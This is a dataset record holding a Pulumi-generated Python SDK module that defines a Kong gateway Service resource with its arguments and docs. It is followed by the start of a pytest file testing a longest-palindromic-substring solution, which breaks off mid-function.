| 0
| 0
| 1
| 0
| true
| 0
| 0.722222
| 0
| 0.722222
| 0.111111
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a773b4d66c44bb9a3985707203b0e93bb7afdbc8
| 29,268
|
py
|
Python
|
sdk/python/pulumi_kong/service.py
|
pulumi/pulumi-kong
|
775c17e4eac38934252410ed3dcdc6fc3bd40c5c
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-02-23T10:05:20.000Z
|
2020-05-15T14:22:10.000Z
|
sdk/python/pulumi_kong/service.py
|
pulumi/pulumi-kong
|
775c17e4eac38934252410ed3dcdc6fc3bd40c5c
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2020-04-21T22:04:23.000Z
|
2022-03-31T15:29:53.000Z
|
sdk/python/pulumi_kong/service.py
|
pulumi/pulumi-kong
|
775c17e4eac38934252410ed3dcdc6fc3bd40c5c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ServiceArgs', 'Service']
# NOTE: generated by the Pulumi Terraform Bridge (tfgen); hand edits will be
# overwritten on regeneration. See the Service resource docstring below for
# the meaning of each argument.
@pulumi.input_type
class ServiceArgs:
    def __init__(__self__, *,
                 protocol: pulumi.Input[str],
                 ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 client_certificate_id: Optional[pulumi.Input[str]] = None,
                 connect_timeout: Optional[pulumi.Input[int]] = None,
                 host: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 read_timeout: Optional[pulumi.Input[int]] = None,
                 retries: Optional[pulumi.Input[int]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tls_verify: Optional[pulumi.Input[bool]] = None,
                 tls_verify_depth: Optional[pulumi.Input[int]] = None,
                 write_timeout: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a Service resource.
        """
        # 'protocol' is the only required input; optional fields are set only
        # when the caller supplied a value, so unset fields stay absent.
        pulumi.set(__self__, "protocol", protocol)
        if ca_certificate_ids is not None:
            pulumi.set(__self__, "ca_certificate_ids", ca_certificate_ids)
        if client_certificate_id is not None:
            pulumi.set(__self__, "client_certificate_id", client_certificate_id)
        if connect_timeout is not None:
            pulumi.set(__self__, "connect_timeout", connect_timeout)
        if host is not None:
            pulumi.set(__self__, "host", host)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if path is not None:
            pulumi.set(__self__, "path", path)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if read_timeout is not None:
            pulumi.set(__self__, "read_timeout", read_timeout)
        if retries is not None:
            pulumi.set(__self__, "retries", retries)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tls_verify is not None:
            pulumi.set(__self__, "tls_verify", tls_verify)
        if tls_verify_depth is not None:
            pulumi.set(__self__, "tls_verify_depth", tls_verify_depth)
        if write_timeout is not None:
            pulumi.set(__self__, "write_timeout", write_timeout)

    # Each property below delegates storage to pulumi.get/pulumi.set; the
    # @pulumi.getter 'name=' argument maps the snake_case Python attribute to
    # its camelCase wire name.

    @property
    @pulumi.getter
    def protocol(self) -> pulumi.Input[str]:
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: pulumi.Input[str]):
        pulumi.set(self, "protocol", value)

    @property
    @pulumi.getter(name="caCertificateIds")
    def ca_certificate_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "ca_certificate_ids")

    @ca_certificate_ids.setter
    def ca_certificate_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ca_certificate_ids", value)

    @property
    @pulumi.getter(name="clientCertificateId")
    def client_certificate_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "client_certificate_id")

    @client_certificate_id.setter
    def client_certificate_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_certificate_id", value)

    @property
    @pulumi.getter(name="connectTimeout")
    def connect_timeout(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "connect_timeout")

    @connect_timeout.setter
    def connect_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "connect_timeout", value)

    @property
    @pulumi.getter
    def host(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "host")

    @host.setter
    def host(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="readTimeout")
    def read_timeout(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "read_timeout")

    @read_timeout.setter
    def read_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "read_timeout", value)

    @property
    @pulumi.getter
    def retries(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "retries")

    @retries.setter
    def retries(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "retries", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tlsVerify")
    def tls_verify(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "tls_verify")

    @tls_verify.setter
    def tls_verify(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "tls_verify", value)

    @property
    @pulumi.getter(name="tlsVerifyDepth")
    def tls_verify_depth(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "tls_verify_depth")

    @tls_verify_depth.setter
    def tls_verify_depth(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "tls_verify_depth", value)

    @property
    @pulumi.getter(name="writeTimeout")
    def write_timeout(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "write_timeout")

    @write_timeout.setter
    def write_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "write_timeout", value)
# NOTE: generated by the Pulumi Terraform Bridge (tfgen); hand edits will be
# overwritten on regeneration. Unlike ServiceArgs, every field here (including
# 'protocol') is optional because state lookups may be partial.
@pulumi.input_type
class _ServiceState:
    def __init__(__self__, *,
                 ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 client_certificate_id: Optional[pulumi.Input[str]] = None,
                 connect_timeout: Optional[pulumi.Input[int]] = None,
                 host: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 read_timeout: Optional[pulumi.Input[int]] = None,
                 retries: Optional[pulumi.Input[int]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tls_verify: Optional[pulumi.Input[bool]] = None,
                 tls_verify_depth: Optional[pulumi.Input[int]] = None,
                 write_timeout: Optional[pulumi.Input[int]] = None):
        """
        Input properties used for looking up and filtering Service resources.
        """
        # set only the fields the caller supplied, so unset fields stay absent
        if ca_certificate_ids is not None:
            pulumi.set(__self__, "ca_certificate_ids", ca_certificate_ids)
        if client_certificate_id is not None:
            pulumi.set(__self__, "client_certificate_id", client_certificate_id)
        if connect_timeout is not None:
            pulumi.set(__self__, "connect_timeout", connect_timeout)
        if host is not None:
            pulumi.set(__self__, "host", host)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if path is not None:
            pulumi.set(__self__, "path", path)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if protocol is not None:
            pulumi.set(__self__, "protocol", protocol)
        if read_timeout is not None:
            pulumi.set(__self__, "read_timeout", read_timeout)
        if retries is not None:
            pulumi.set(__self__, "retries", retries)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tls_verify is not None:
            pulumi.set(__self__, "tls_verify", tls_verify)
        if tls_verify_depth is not None:
            pulumi.set(__self__, "tls_verify_depth", tls_verify_depth)
        if write_timeout is not None:
            pulumi.set(__self__, "write_timeout", write_timeout)

    # Each property below delegates storage to pulumi.get/pulumi.set; the
    # @pulumi.getter 'name=' argument maps the snake_case Python attribute to
    # its camelCase wire name.

    @property
    @pulumi.getter(name="caCertificateIds")
    def ca_certificate_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "ca_certificate_ids")

    @ca_certificate_ids.setter
    def ca_certificate_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ca_certificate_ids", value)

    @property
    @pulumi.getter(name="clientCertificateId")
    def client_certificate_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "client_certificate_id")

    @client_certificate_id.setter
    def client_certificate_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_certificate_id", value)

    @property
    @pulumi.getter(name="connectTimeout")
    def connect_timeout(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "connect_timeout")

    @connect_timeout.setter
    def connect_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "connect_timeout", value)

    @property
    @pulumi.getter
    def host(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "host")

    @host.setter
    def host(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter
    def protocol(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol", value)

    @property
    @pulumi.getter(name="readTimeout")
    def read_timeout(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "read_timeout")

    @read_timeout.setter
    def read_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "read_timeout", value)

    @property
    @pulumi.getter
    def retries(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "retries")

    @retries.setter
    def retries(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "retries", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tlsVerify")
    def tls_verify(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "tls_verify")

    @tls_verify.setter
    def tls_verify(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "tls_verify", value)

    @property
    @pulumi.getter(name="tlsVerifyDepth")
    def tls_verify_depth(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "tls_verify_depth")

    @tls_verify_depth.setter
    def tls_verify_depth(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "tls_verify_depth", value)

    @property
    @pulumi.getter(name="writeTimeout")
    def write_timeout(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "write_timeout")

    @write_timeout.setter
    def write_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "write_timeout", value)
class Service(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
client_certificate_id: Optional[pulumi.Input[str]] = None,
connect_timeout: Optional[pulumi.Input[int]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
read_timeout: Optional[pulumi.Input[int]] = None,
retries: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tls_verify: Optional[pulumi.Input[bool]] = None,
tls_verify_depth: Optional[pulumi.Input[int]] = None,
write_timeout: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
## # Service
The service resource maps directly onto the json for the service endpoint in Kong. For more information on the parameters [see the Kong Service create documentation](https://docs.konghq.com/gateway-oss/2.5.x/admin-api/#service-object).
## Example Usage
```python
import pulumi
import pulumi_kong as kong
service = kong.Service("service",
connect_timeout=1000,
host="test.org",
path="/mypath",
port=8080,
protocol="http",
read_timeout=3000,
retries=5,
write_timeout=2000)
```
To use a client certificate and ca certificates combine with certificate resource (note protocol must be `https`):
```python
import pulumi
import pulumi_kong as kong
certificate = kong.Certificate("certificate",
certificate=\"\"\" -----BEGIN CERTIFICATE-----
......
-----END CERTIFICATE-----
\"\"\",
private_key=\"\"\" -----BEGIN PRIVATE KEY-----
.....
-----END PRIVATE KEY-----
\"\"\",
snis=["foo.com"])
ca = kong.Certificate("ca",
certificate=\"\"\" -----BEGIN CERTIFICATE-----
......
-----END CERTIFICATE-----
\"\"\",
private_key=\"\"\" -----BEGIN PRIVATE KEY-----
.....
-----END PRIVATE KEY-----
\"\"\",
snis=["ca.com"])
service = kong.Service("service",
protocol="https",
host="test.org",
tls_verify=True,
tls_verify_depth=2,
client_certificate_id=certificate.id,
ca_certificate_ids=[ca.id])
```
## Argument reference
* `name` - (Required) Service name
* `protocol` - (Required) Protocol to use
* `host` - (Optional) Host to map to
* `port` - (Optional, int) Port to map to. Default: 80
* `path` - (Optional) Path to map to
* `retries` - (Optional, int) Number of retries. Default: 5
* `connect_timeout` - (Optional, int) Connection timeout. Default(ms): 60000
* `write_timeout` - (Optional, int) Write timout. Default(ms): 60000
* `read_timeout` - (Optional, int) Read timeout. Default(ms): 60000
* `tags` - (Optional) A list of strings associated with the Service for grouping and filtering.
* `client_certificate_id` - (Optional) ID of Certificate to be used as client certificate while TLS handshaking to the upstream server. Use ID from `Certificate` resource
* `tls_verify` - (Optional) Whether to enable verification of upstream server TLS certificate. If not set then the nginx default is respected.
* `tls_verify_depth` - (Optional) Maximum depth of chain while verifying Upstream server’s TLS certificate.
* `ca_certificate_ids` - (Optional) A of CA Certificate IDs (created from the certificate resource). that are used to build the trust store while verifying upstream server’s TLS certificate.
## Import
To import a service
```sh
$ pulumi import kong:index/service:Service <service_identifier> <service_id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
             resource_name: str,
             args: ServiceArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    ## # Service
    The service resource maps directly onto the json for the service endpoint in Kong. For more information on the parameters [see the Kong Service create documentation](https://docs.konghq.com/gateway-oss/2.5.x/admin-api/#service-object).
    ## Example Usage
    ```python
    import pulumi
    import pulumi_kong as kong
    service = kong.Service("service",
        connect_timeout=1000,
        host="test.org",
        path="/mypath",
        port=8080,
        protocol="http",
        read_timeout=3000,
        retries=5,
        write_timeout=2000)
    ```
    To use a client certificate and ca certificates combine with certificate resource (note protocol must be `https`):
    ```python
    import pulumi
    import pulumi_kong as kong
    certificate = kong.Certificate("certificate",
        certificate=\"\"\" -----BEGIN CERTIFICATE-----
    ......
    -----END CERTIFICATE-----
    \"\"\",
        private_key=\"\"\" -----BEGIN PRIVATE KEY-----
    .....
    -----END PRIVATE KEY-----
    \"\"\",
        snis=["foo.com"])
    ca = kong.Certificate("ca",
        certificate=\"\"\" -----BEGIN CERTIFICATE-----
    ......
    -----END CERTIFICATE-----
    \"\"\",
        private_key=\"\"\" -----BEGIN PRIVATE KEY-----
    .....
    -----END PRIVATE KEY-----
    \"\"\",
        snis=["ca.com"])
    service = kong.Service("service",
        protocol="https",
        host="test.org",
        tls_verify=True,
        tls_verify_depth=2,
        client_certificate_id=certificate.id,
        ca_certificate_ids=[ca.id])
    ```
    ## Argument reference
    * `name` - (Required) Service name
    * `protocol` - (Required) Protocol to use
    * `host` - (Optional) Host to map to
    * `port` - (Optional, int) Port to map to. Default: 80
    * `path` - (Optional) Path to map to
    * `retries` - (Optional, int) Number of retries. Default: 5
    * `connect_timeout` - (Optional, int) Connection timeout. Default(ms): 60000
    * `write_timeout` - (Optional, int) Write timeout. Default(ms): 60000
    * `read_timeout` - (Optional, int) Read timeout. Default(ms): 60000
    * `tags` - (Optional) A list of strings associated with the Service for grouping and filtering.
    * `client_certificate_id` - (Optional) ID of Certificate to be used as client certificate while TLS handshaking to the upstream server. Use ID from `Certificate` resource
    * `tls_verify` - (Optional) Whether to enable verification of upstream server TLS certificate. If not set then the nginx default is respected.
    * `tls_verify_depth` - (Optional) Maximum depth of chain while verifying Upstream server's TLS certificate.
    * `ca_certificate_ids` - (Optional) A list of CA Certificate IDs (created from the certificate resource) that are used to build the trust store while verifying upstream server's TLS certificate.
    ## Import
    To import a service
    ```sh
    $ pulumi import kong:index/service:Service <service_identifier> <service_id>
    ```
    :param str resource_name: The name of the resource.
    :param ServiceArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """Dispatch construction to ``_internal_init``.

    Supports both calling conventions: an explicit ``ServiceArgs`` bag
    (positional or ``args=`` keyword) or individual keyword arguments.
    """
    resource_args, opts = _utilities.get_resource_args_opts(ServiceArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is None:
        # Keyword-argument form: forward everything untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Args-object form: expand the bag into keyword arguments.
        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   client_certificate_id: Optional[pulumi.Input[str]] = None,
                   connect_timeout: Optional[pulumi.Input[int]] = None,
                   host: Optional[pulumi.Input[str]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   path: Optional[pulumi.Input[str]] = None,
                   port: Optional[pulumi.Input[int]] = None,
                   protocol: Optional[pulumi.Input[str]] = None,
                   read_timeout: Optional[pulumi.Input[int]] = None,
                   retries: Optional[pulumi.Input[int]] = None,
                   tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   tls_verify: Optional[pulumi.Input[bool]] = None,
                   tls_verify_depth: Optional[pulumi.Input[int]] = None,
                   write_timeout: Optional[pulumi.Input[int]] = None,
                   __props__=None):
    """Validate options, assemble the input property bag, and register the resource.

    ``__props__`` may only be supplied together with ``opts.id`` (resource lookup);
    for a fresh resource the bag is built here from the keyword arguments.
    """
    # Normalise and validate the resource options up front.
    if opts is None:
        opts = pulumi.ResourceOptions()
    elif not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    if opts.id is None:
        # Creating a new resource: a caller-supplied property bag is invalid here.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        # `protocol` is required unless we are adopting an existing URN.
        if protocol is None and not opts.urn:
            raise TypeError("Missing required property 'protocol'")
        __props__ = ServiceArgs.__new__(ServiceArgs)
        for prop_name, prop_value in (
                ("ca_certificate_ids", ca_certificate_ids),
                ("client_certificate_id", client_certificate_id),
                ("connect_timeout", connect_timeout),
                ("host", host),
                ("name", name),
                ("path", path),
                ("port", port),
                ("protocol", protocol),
                ("read_timeout", read_timeout),
                ("retries", retries),
                ("tags", tags),
                ("tls_verify", tls_verify),
                ("tls_verify_depth", tls_verify_depth),
                ("write_timeout", write_timeout)):
            __props__.__dict__[prop_name] = prop_value
    super(Service, __self__).__init__(
        'kong:index/service:Service',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        ca_certificate_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        client_certificate_id: Optional[pulumi.Input[str]] = None,
        connect_timeout: Optional[pulumi.Input[int]] = None,
        host: Optional[pulumi.Input[str]] = None,
        name: Optional[pulumi.Input[str]] = None,
        path: Optional[pulumi.Input[str]] = None,
        port: Optional[pulumi.Input[int]] = None,
        protocol: Optional[pulumi.Input[str]] = None,
        read_timeout: Optional[pulumi.Input[int]] = None,
        retries: Optional[pulumi.Input[int]] = None,
        tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        tls_verify: Optional[pulumi.Input[bool]] = None,
        tls_verify_depth: Optional[pulumi.Input[int]] = None,
        write_timeout: Optional[pulumi.Input[int]] = None) -> 'Service':
    """
    Get an existing Service resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.
    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    # Fold the provider ID into the options so the engine performs a lookup.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    __props__ = _ServiceState.__new__(_ServiceState)
    # Seed the state bag with whatever qualifying values the caller supplied.
    __props__.__dict__.update({
        "ca_certificate_ids": ca_certificate_ids,
        "client_certificate_id": client_certificate_id,
        "connect_timeout": connect_timeout,
        "host": host,
        "name": name,
        "path": path,
        "port": port,
        "protocol": protocol,
        "read_timeout": read_timeout,
        "retries": retries,
        "tags": tags,
        "tls_verify": tls_verify,
        "tls_verify_depth": tls_verify_depth,
        "write_timeout": write_timeout,
    })
    return Service(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="caCertificateIds")
def ca_certificate_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
    """CA Certificate IDs (created from the certificate resource) used to build the trust store while verifying the upstream server's TLS certificate."""
    return pulumi.get(self, "ca_certificate_ids")
@property
@pulumi.getter(name="clientCertificateId")
def client_certificate_id(self) -> pulumi.Output[Optional[str]]:
    """ID of the Certificate used as client certificate while TLS handshaking to the upstream server."""
    return pulumi.get(self, "client_certificate_id")
@property
@pulumi.getter(name="connectTimeout")
def connect_timeout(self) -> pulumi.Output[Optional[int]]:
    """Connection timeout in milliseconds. Default: 60000."""
    return pulumi.get(self, "connect_timeout")
@property
@pulumi.getter
def host(self) -> pulumi.Output[Optional[str]]:
    """Host to map to."""
    return pulumi.get(self, "host")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """Service name (required)."""
    return pulumi.get(self, "name")
@property
@pulumi.getter
def path(self) -> pulumi.Output[Optional[str]]:
    """Path to map to."""
    return pulumi.get(self, "path")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
    """Port to map to. Default: 80."""
    return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
    """Protocol to use (required)."""
    return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="readTimeout")
def read_timeout(self) -> pulumi.Output[Optional[int]]:
    """Read timeout in milliseconds. Default: 60000."""
    return pulumi.get(self, "read_timeout")
@property
@pulumi.getter
def retries(self) -> pulumi.Output[Optional[int]]:
    """Number of retries. Default: 5."""
    return pulumi.get(self, "retries")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
    """A list of strings associated with the Service for grouping and filtering."""
    return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tlsVerify")
def tls_verify(self) -> pulumi.Output[Optional[bool]]:
    """Whether to enable verification of the upstream server's TLS certificate. If not set, the nginx default is respected."""
    return pulumi.get(self, "tls_verify")
@property
@pulumi.getter(name="tlsVerifyDepth")
def tls_verify_depth(self) -> pulumi.Output[Optional[int]]:
    """Maximum depth of chain while verifying the upstream server's TLS certificate."""
    return pulumi.get(self, "tls_verify_depth")
@property
@pulumi.getter(name="writeTimeout")
def write_timeout(self) -> pulumi.Output[Optional[int]]:
    """Write timeout in milliseconds. Default: 60000."""
    return pulumi.get(self, "write_timeout")
| 39.874659
| 244
| 0.619038
| 3,331
| 29,268
| 5.198139
| 0.069349
| 0.094023
| 0.13497
| 0.068611
| 0.906555
| 0.898932
| 0.882876
| 0.871672
| 0.855905
| 0.828703
| 0
| 0.003543
| 0.257414
| 29,268
| 733
| 245
| 39.929059
| 0.793135
| 0.21925
| 0
| 0.866379
| 1
| 0
| 0.083055
| 0.009981
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165948
| false
| 0.002155
| 0.010776
| 0.090517
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7aa90080b2951abd0d6d93a271b85572a8280fe
| 3,990
|
py
|
Python
|
tests/longest_palindrome_substr_test.py
|
gradeawarrior/python-interview-problems
|
ede738df98f979c45b6657aa6147f0fd5cbfc3dc
|
[
"Apache-2.0"
] | null | null | null |
tests/longest_palindrome_substr_test.py
|
gradeawarrior/python-interview-problems
|
ede738df98f979c45b6657aa6147f0fd5cbfc3dc
|
[
"Apache-2.0"
] | null | null | null |
tests/longest_palindrome_substr_test.py
|
gradeawarrior/python-interview-problems
|
ede738df98f979c45b6657aa6147f0fd5cbfc3dc
|
[
"Apache-2.0"
] | null | null | null |
"""
Given a string s, find the longest palindromic substring in s. You may assume that the maximum
length of s is 1000.
Example:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
Example:
Input: "cbbd"
Output: "bb"
"""
import pytest
from project.longest_palindrome_substr import Solution
from time import time
@pytest.mark.parametrize("test_input, expected", [
("babad", "bab"),
("cbbd", "bb"),
("", ""),
("a", "a"),
("ab", "a"),
("abc", "a"),
("abcdd", "dd"),
("aaabaaaa", "aaabaaa"),
("salas", "salas"),
("psalas", "salas"),
("peter salas", "salas"),
("abcdefghijklmnopqrstuvwxyz", "a"),
("abcdefghijklmmnopqrstuvwxyz", "mm"),
("abcdefghijklmnopqrstuvwxyzz", "zz"),
("abcdefghijklmnopqrstuvwxyzzz", "zzz"),
("kztakrekvefgchersuoiuatzlmwynzjhdqqftjcqmntoyckqfawikkdrnfgbwtdpbkymvwoumurjdzygyzsbmwzpcxcdmmpwzmeibligwiiqbecxwyxigikoewwrczkanwwqukszsbjukzumzladrvjefpegyicsgctdvldetuegxwihdtitqrdmygdrsweahfrepdcudvyvrggbkthztxwicyzazjyeztytwiyybqdsczozvtegodacdokczfmwqfmyuixbeeqluqcqwxpyrkpfcdosttzooykpvdykfxulttvvwnzftndvhsvpgrgdzsvfxdtzztdiswgwxzvbpsjlizlfrlgvlnwbjwbujafjaedivvgnbgwcdbzbdbprqrflfhahsvlcekeyqueyxjfetkxpapbeejoxwxlgepmxzowldsmqllpzeymakcshfzkvyykwljeltutdmrhxcbzizihzinywggzjctzasvefcxmhnusdvlderconvaisaetcdldeveeemhugipfzbhrwidcjpfrumshbdofchpgcsbkvaexfmenpsuodatxjavoszcitjewflejjmsuvyuyrkumednsfkbgvbqxfphfqeqozcnabmtedffvzwbgbzbfydiyaevoqtfmzxaujdydtjftapkpdhnbmrylcibzuqqynvnsihmyxdcrfftkuoymzoxpnashaderlosnkxbhamkkxfhwjsyehkmblhppbyspmcwuoguptliashefdklokjpggfiixozsrlwmeksmzdcvipgkwxwynzsvxnqtchgwwadqybkguscfyrbyxudzrxacoplmcqcsmkraimfwbauvytkxdnglwfuvehpxd", "dtzztd"),
("iptmykvjanwiihepqhzupneckpzomgvzmyoybzfynybpfybngttozprjbupciuinpzryritfmyxyppxigitnemanreexcpwscvcwddnfjswgprabdggbgcillisyoskdodzlpbltefiz", "illi"),
])
def test_palindrome_brute_force(test_input, expected):
    """Check the brute-force longest-palindrome result and that it finishes within the time budget."""
    from time import perf_counter  # monotonic, high-resolution clock for durations
    threshold = 800  # ms
    # time.time() is wall-clock and can jump (e.g. NTP adjustments), which would
